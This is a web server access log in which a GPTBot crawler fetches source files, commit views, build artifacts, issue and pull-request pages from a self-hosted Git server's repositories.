"https://git.hanmocnn.co.kr/windpacer/homepage/src/branch/main/html/index.html" -[17/Feb/2026:17:11:27 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/pulls?sort=mostcomment&state=open&type=all" [Client 74.7.227.38] [Length 9966] [Gzip 3.49] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/pulls" -[17/Feb/2026:17:11:28 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/18fa480c84b358da8bf50d54057f53591759225f/asset_pilot_docker/.venv/bin/python3.12?display=source" [Client 74.7.227.38] [Length 11089] [Gzip 2.99] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/18fa480c84b358da8bf50d54057f53591759225f/asset_pilot_docker/.venv/bin/python3.12" -[17/Feb/2026:17:11:28 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/bf87175f515287fd25d175843915ffa6178025eb/asset_pilot_docker/.venv/bin/python3.12?display=source" [Client 74.7.227.38] [Length 11059] [Gzip 3.00] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/bf87175f515287fd25d175843915ffa6178025eb/asset_pilot_docker/.venv/bin/python3.12" -[17/Feb/2026:17:11:29 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/branch/main/GoldMonitor/GoldMonitor_VeryGood.py?display=rendered" [Client 74.7.227.38] [Length 11139] [Gzip 3.03] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldMonitor/GoldMonitor_VeryGood.py" -[17/Feb/2026:17:11:29 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/branch/main/html/assets/js/script.js?display=source" [Client 74.7.227.38] [Length 14105] [Gzip 4.39] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/branch/main/html/assets/js/script.js" -[17/Feb/2026:17:11:30 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/branch/main/PostgresPatrol/watchdog_final_debug.spec" [Client 74.7.227.38] [Length 9863] [Gzip 2.88] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/PostgresPatrol/watchdog_final_debug.spec" -[17/Feb/2026:17:11:30 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/aeec38c08f4b3b16e26a997a70d46a8d04e5896d/C++Project/TestProject/build/CMakeFiles/TestApp.dir/compiler_depend.make?display=rendered" [Client 74.7.227.38] [Length 11103] [Gzip 3.10] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/aeec38c08f4b3b16e26a997a70d46a8d04e5896d/C++Project/TestProject/build/CMakeFiles/TestApp.dir/compiler_depend.make" -[17/Feb/2026:17:11:31 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/_new/main/OpcConnectionTest/obj/project.assets.json" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/blame/branch/main/OpcConnectionTest/obj/project.assets.json" -[17/Feb/2026:17:11:31 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4851] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/_new/main/OpcConnectionTest/obj/project.assets.json" -[17/Feb/2026:17:11:31 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/issues?milestone=-1&state=open&type=all" [Client 74.7.227.38] [Length 10148] [Gzip 3.43] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/issues" -[17/Feb/2026:17:11:32 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/branch/main/PostgresPatrol/performance_comparison.py?display=source" [Client 74.7.227.38] [Length 17017] [Gzip 5.59] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/PostgresPatrol/performance_comparison.py" -[17/Feb/2026:17:11:32 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/industrial-comm/src-old/old_log_macros.hpp" [Client 74.7.227.38] [Length 11860] [Gzip 3.44] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/industrial-comm/src-old" -[17/Feb/2026:17:11:33 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/industrial-comm/src-old/old_log_macros.hpp" [Client 74.7.227.38] [Length 11857] [Gzip 3.44] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/industrial-comm/src-old" -[17/Feb/2026:17:11:34 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/industrial-comm/src-old/old_log_macros.hpp" [Client 74.7.227.38] [Length 11856] [Gzip 3.44] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/industrial-comm/src-old" -[17/Feb/2026:17:11:34 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/b5cff16c16c89165fbeab6bb0b379c0cfafcce7a/C++Project/TestProject/CMakeLists.txt?display=rendered" [Client 74.7.227.38] [Length 10981] [Gzip 3.01] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/b5cff16c16c89165fbeab6bb0b379c0cfafcce7a/C++Project/TestProject/CMakeLists.txt" -[17/Feb/2026:17:11:35 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/b5cff16c16c89165fbeab6bb0b379c0cfafcce7a/C++Project/TestProject/CMakeLists.txt?display=source" [Client 74.7.227.38] [Length 11692] [Gzip 3.14] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/b5cff16c16c89165fbeab6bb0b379c0cfafcce7a/C++Project/TestProject/CMakeLists.txt" -[17/Feb/2026:17:11:35 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commit/e54b4e832455afb83987fc146872a66900dee5c0?files=C%2b%2bProject%2findustrial-comm%2fcpp%2fsrc%2fcontroller.cpp" [Client 74.7.227.38] [Length 26220] [Gzip 4.62] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/commits/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/industrial-comm/cpp/src/controller.cpp" -[17/Feb/2026:17:11:36 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977?files=C%2b%2bProject%2findustrial-comm%2fcpp%2finclude%2ftransport.hpp" [Client 74.7.227.38] [Length 19893] [Gzip 4.47] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/commits/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/industrial-comm/cpp/include/transport.hpp" -[17/Feb/2026:17:11:36 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commit/3e4db647c22a7292965a613e62ce815b9da823a8?files=C%2b%2bProject%2findustrial-comm%2fcpp%2finclude%2flogger.hpp" [Client 74.7.227.38] [Length 25172] [Gzip 4.80] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/commits/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/industrial-comm/cpp/include/logger.hpp" -[17/Feb/2026:17:11:37 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977?files=C%2b%2bProject%2findustrial-comm%2fcpp%2fsrc%2fcontroller.cpp" [Client 74.7.227.38] [Length 26930] [Gzip 7.90] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/commits/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/industrial-comm/cpp/src/controller.cpp" -[17/Feb/2026:17:11:37 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/blame/commit/fc1462a3f3e004bb33b52808fd01df2dfdbf79d3/.TemporaryDocument/%ED%95%84%EC%9A%94%20Linux%EB%AA%85%EB%A0%B9%EB%93%A4%20%EB%AA%A8%EC%9D%8C.md" [Client 74.7.227.38] [Length 13531] [Gzip 5.51] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/fc1462a3f3e004bb33b52808fd01df2dfdbf79d3/.TemporaryDocument/%ED%95%84%EC%9A%94%20Linux%EB%AA%85%EB%A0%B9%EB%93%A4%20%EB%AA%A8%EC%9D%8C.md" -[17/Feb/2026:17:11:38 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/blame/commit/1ba28dbce67b92a8a16ef4e5a21db13fbfa229fa/.TemporaryDocument/%ED%95%84%EC%9A%94%20Linux%EB%AA%85%EB%A0%B9%EB%93%A4%20%EB%AA%A8%EC%9D%8C.md" [Client 74.7.227.38] [Length 12720] [Gzip 4.69] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/blame/commit/18fa480c84b358da8bf50d54057f53591759225f/.TemporaryDocument/%ED%95%84%EC%9A%94%20Linux%EB%AA%85%EB%A0%B9%EB%93%A4%20%EB%AA%A8%EC%9D%8C.md" -[17/Feb/2026:17:11:38 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/industrial-comm/src-old/old_log_macros.hpp" [Client 74.7.227.38] [Length 9988] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/industrial-comm/src-old/old_log_macros.hpp" -[17/Feb/2026:17:11:39 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/industrial-comm/src-old/old_log_macros.hpp" [Client 74.7.227.38] [Length 9988] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/industrial-comm/src-old/old_log_macros.hpp" -[17/Feb/2026:17:11:39 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/industrial-comm/src-old/old_log_macros.hpp" [Client 74.7.227.38] [Length 9988] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/industrial-comm/src-old/old_log_macros.hpp" -[17/Feb/2026:17:11:40 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/industrial-comm/src-old/old_log_macros.hpp" [Client 74.7.227.38] [Length 552] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/industrial-comm/src-old/old_log_macros.hpp" -[17/Feb/2026:17:11:40 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/industrial-comm/src-old/old_log_macros.hpp" [Client 74.7.227.38] [Length 552] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/industrial-comm/src-old/old_log_macros.hpp" -[17/Feb/2026:17:11:41 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/industrial-comm/src-old/old_log_macros.hpp" [Client 74.7.227.38] [Length 552] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/industrial-comm/src-old/old_log_macros.hpp" -[17/Feb/2026:17:11:42 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/TestProject/build/CMakeFiles/progress.marks?display=source" [Client 74.7.227.38] [Length 11119] [Gzip 3.03] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/TestProject/build/CMakeFiles/progress.marks" -[17/Feb/2026:17:11:42 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/TestProject/build/CMakeFiles/Makefile.cmake?display=source" [Client 74.7.227.38] [Length 14658] [Gzip 5.26] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/TestProject/build/CMakeFiles/Makefile.cmake" -[17/Feb/2026:17:11:43 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/issues?milestone=-1&state=open&type=all" [Client 74.7.227.38] [Length 10149] [Gzip 3.43] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/issues" -[17/Feb/2026:17:11:43 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/6e9a7ed81bf6cf5e1946c5d7db1ffbaf9639424d/.Backup/html/assets/images/ControlRoom2.png?display=rendered" [Client 74.7.227.38] [Length 10900] [Gzip 2.99] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/6e9a7ed81bf6cf5e1946c5d7db1ffbaf9639424d/.Backup/html/assets/images/ControlRoom2.png" -[17/Feb/2026:17:11:44 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/6e9a7ed81bf6cf5e1946c5d7db1ffbaf9639424d/.Backup/html/assets/images/ControlRoom6.png?display=rendered" [Client 74.7.227.38] [Length 10901] [Gzip 2.99] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/6e9a7ed81bf6cf5e1946c5d7db1ffbaf9639424d/.Backup/html/assets/images/ControlRoom6.png" -[17/Feb/2026:17:11:44 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/6e9a7ed81bf6cf5e1946c5d7db1ffbaf9639424d/.Backup/html/assets/images/ControlRoom5.png?display=rendered" [Client 74.7.227.38] [Length 10896] [Gzip 2.99] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/6e9a7ed81bf6cf5e1946c5d7db1ffbaf9639424d/.Backup/html/assets/images/ControlRoom5.png" -[17/Feb/2026:17:11:45 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/6e9a7ed81bf6cf5e1946c5d7db1ffbaf9639424d/.Backup/html/assets/images/ControlRoom4.png?display=rendered" [Client 74.7.227.38] [Length 10901] [Gzip 2.99] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/6e9a7ed81bf6cf5e1946c5d7db1ffbaf9639424d/.Backup/html/assets/images/ControlRoom4.png" -[17/Feb/2026:17:11:45 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/6e9a7ed81bf6cf5e1946c5d7db1ffbaf9639424d/.Backup/html/assets/images/ControlRoom1.png?display=rendered" [Client 74.7.227.38] [Length 10900] [Gzip 2.99] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/6e9a7ed81bf6cf5e1946c5d7db1ffbaf9639424d/.Backup/html/assets/images/ControlRoom1.png" -[17/Feb/2026:17:11:46 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/6e9a7ed81bf6cf5e1946c5d7db1ffbaf9639424d/.Backup/html/assets/images/ControlRoom3.png?display=rendered" [Client 74.7.227.38] [Length 10901] [Gzip 2.99] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/6e9a7ed81bf6cf5e1946c5d7db1ffbaf9639424d/.Backup/html/assets/images/ControlRoom3.png" -[17/Feb/2026:17:11:47 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commit/9374d883a61b35708b6c621337a654b11bcdb426?files=git%20%ec%84%9c%eb%b2%84%20%ec%82%ac%ec%9a%a9%eb%b2%95%20%eb%8c%80%ed%99%94%20%eb%b3%b4%ea%b4%80" [Client 74.7.227.38] [Length 18498] [Gzip 4.18] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/commits/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/git%20%EC%84%9C%EB%B2%84%20%EC%82%AC%EC%9A%A9%EB%B2%95%20%EB%8C%80%ED%99%94%20%EB%B3%B4%EA%B4%80" -[17/Feb/2026:17:11:47 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/63aec54418d3c1735d68bf046c7a9e78a247798d/.Backup/html/index.tsx?display=rendered" [Client 74.7.227.38] [Length 10914] [Gzip 2.97] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/63aec54418d3c1735d68bf046c7a9e78a247798d/.Backup/html/index.tsx" -[17/Feb/2026:17:11:48 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/pulls?labels=0&sort=latest&state=all&type=all" [Client 74.7.227.38] [Length 9972] [Gzip 3.49] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/pulls?labels=0&state=all&type=all" -[17/Feb/2026:17:11:49 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/GoldMonitor/build/GoldMonitor_V5.1/localpycs/pyimod04_pywin32.pyc?display=rendered" [Client 74.7.227.38] [Length 10934] [Gzip 3.03] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/GoldMonitor/build/GoldMonitor_V5.1/localpycs/pyimod04_pywin32.pyc" -[17/Feb/2026:17:11:49 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/GoldMonitor/build/GoldMonitor_V5.2/localpycs/pyimod04_pywin32.pyc?display=rendered" [Client 74.7.227.38] [Length 10935] [Gzip 3.03] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/GoldMonitor/build/GoldMonitor_V5.2/localpycs/pyimod04_pywin32.pyc" -[17/Feb/2026:17:11:50 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/GoldMonitor/build/GoldMonitor_V5.3/localpycs/pyimod04_pywin32.pyc?display=rendered" [Client 74.7.227.38] [Length 10934] [Gzip 3.03] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/GoldMonitor/build/GoldMonitor_V5.3/localpycs/pyimod04_pywin32.pyc" -[17/Feb/2026:17:11:50 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/industrial-comm/build/CMakeFiles/Makefile.cmake?display=rendered" [Client 74.7.227.38] [Length 11067] [Gzip 3.07] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/industrial-comm/build/CMakeFiles/Makefile.cmake" -[17/Feb/2026:17:11:51 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/e54b4e832455afb83987fc146872a66900dee5c0/C++Project/TestProject/build/CMakeFiles/cmake.check_cache?display=rendered" [Client 74.7.227.38] [Length 11035] [Gzip 3.07] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/e54b4e832455afb83987fc146872a66900dee5c0/C++Project/TestProject/build/CMakeFiles/cmake.check_cache" -[17/Feb/2026:17:11:51 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/industrial-comm/build/CMakeFiles/Makefile.cmake?display=rendered" [Client 74.7.227.38] [Length 11097] [Gzip 3.06] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/industrial-comm/build/CMakeFiles/Makefile.cmake" -[17/Feb/2026:17:11:52 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/industrial-comm/build/CMakeFiles/Makefile.cmake?display=rendered" [Client 74.7.227.38] [Length 11095] [Gzip 3.06] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/industrial-comm/build/CMakeFiles/Makefile.cmake" -[17/Feb/2026:17:11:52 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/TestProject/build/CMakeFiles/cmake.check_cache?display=rendered" [Client 74.7.227.38] [Length 11057] [Gzip 3.07] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/TestProject/build/CMakeFiles/cmake.check_cache" -[17/Feb/2026:17:11:53 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/industrial-comm/build/CMakeFiles/progress.marks?display=rendered" [Client 74.7.227.38] [Length 11101] [Gzip 3.06] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/industrial-comm/build/CMakeFiles/progress.marks" -[17/Feb/2026:17:11:53 +0000] - 200 200 - GET https git.hanmocnn.co.kr 